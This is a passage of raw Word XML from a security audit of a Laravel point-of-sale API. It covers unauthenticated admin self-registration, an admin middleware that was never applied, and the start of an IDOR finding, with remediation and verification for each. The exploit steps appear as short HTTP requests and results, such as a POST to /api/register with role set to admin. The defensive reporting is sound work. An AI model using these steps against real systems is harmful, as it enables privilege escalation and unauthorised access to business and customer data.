          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'role' =&gt; 'required|in:admin,employee'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  wrote it through at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:227</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and minted a token at</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:232</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75">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="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Exploit, executed against the original:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000077">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POST /api/register        (no Authorization header)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078">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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079">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"username":"attacker_...","password":"password","role":"admin", ...</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">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201 Created, role granted = admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C">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GET /all-users with the returned token → 200, 5 user records returned</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D">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Root cause.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Two independent mistakes compounding. The route was never placed in a protected group — plausibly a scaffolding leftover, since </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> legitimately belongs there and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/register</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was written beside it. And the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field was treated as ordinary user input rather than as a privilege assignment. Either alone is survivable; together they are total compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="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The route moved inside auth:sanctum + admin . Registration no longer issues a token at all: an administrator creating a staff account has no business receiving that account's session. Password policy strengthened (V-05c).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="7860"/>
        </w:tabs>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="1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Verified.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST /register unauthenticated → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">401</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, no user created. As a cashier → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="7860"/>
        </w:tabs>
        <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="16"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V-02 · The role gate was written and never applied</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="none" w:pos="7860"/>
        </w:tabs>
        <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="1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A01:2021 / API5:2023 BFLA · </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CWE-285</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Critical</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083">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Evidence.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The application already contained a correct implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084">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app/Http/Middleware/AdminMiddleware.php:25</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">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if ($request-&gt;user()-&gt;role !== 'admin') {</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">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return response()-&gt;json([...], 403);</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">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p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">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app/Http/Kernel.php:67</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">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'admin' =&gt; \App\Http\Middleware\AdminMiddleware::class,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">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A grep of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">routes/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> found </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">one</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> middleware call in the entire file: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Route::middleware('auth:sanctum')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> at line 31.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AuthServiceProvider:15</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> had an empty </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$policies</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> array, and there was no </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gate::define</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> anywhere in the project.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="1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C">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="1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D">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="1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E">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="16" w:hanging="1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F">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Exploit.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> With an ordinary cashier's token, not one of these was refused:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="10194.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="38.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0400"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5248"/>
        <w:gridCol w:w="1185"/>
        <w:gridCol w:w="3761"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="5248"/>
            <w:gridCol w:w="1185"/>
            <w:gridCol w:w="3761"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="5"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1">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2">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Impact</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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3">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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GET /reports/daily-profit</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4">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5">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Company-wide profit and margin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="439"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6">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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GET /reports/customers</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7">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8">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entire customer list</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9">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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POST /grn-items/update-selling-price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A">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B">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Reprice any stock batch</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="446"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C">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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PUT /invoices/{id}</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D">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reached</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E">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Void any sale</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F">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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POST /grns/adjust-quantity</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A0">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reached</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A1">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Rewrite stock quantities</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A2">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="4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POST /customers/{id}/adjust-credit</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A3">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reached</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A4">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Zero any customer's debt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A5">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Root cause.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the most instructive finding in the report. The security control was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">designed, implemented and registered</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then not connected. Everything about the codebase says someone understood the requirement. What was missing was any mechanism that would notice the gap: no test asserted that a privileged route refuses an employee, and nothing in code review made "which routes are admin-only?" a visible question.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A6">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Tellingly, DiscountRequestController::approve:156 and reject:244 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">do</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> contain inline role checks. The knowledge was present; the systematic application was not.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">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routes/api.php restructured into three explicit tiers public, auth:sanctum + active , and + admin with each placement decided by what the job actually requires and commented accordingly. Cashiers keep creating invoices, creating and finding customers, and taking credit payments. Cancelling an invoice, adjusting a credit balance, repricing and all cost/margin reporting became admin-only. The inline checks in DiscountRequestController are now backed by route middleware so a future handler cannot forget.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">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Verified.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eleven privileged endpoints, each asserted to return 403 for an employee </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to remain reachable for an administrator a gate that refuses everybody is not a fix.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="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V-03 · IDOR no branch scoping on any record lookup</w:t>
      </w:r>
    </w:p>
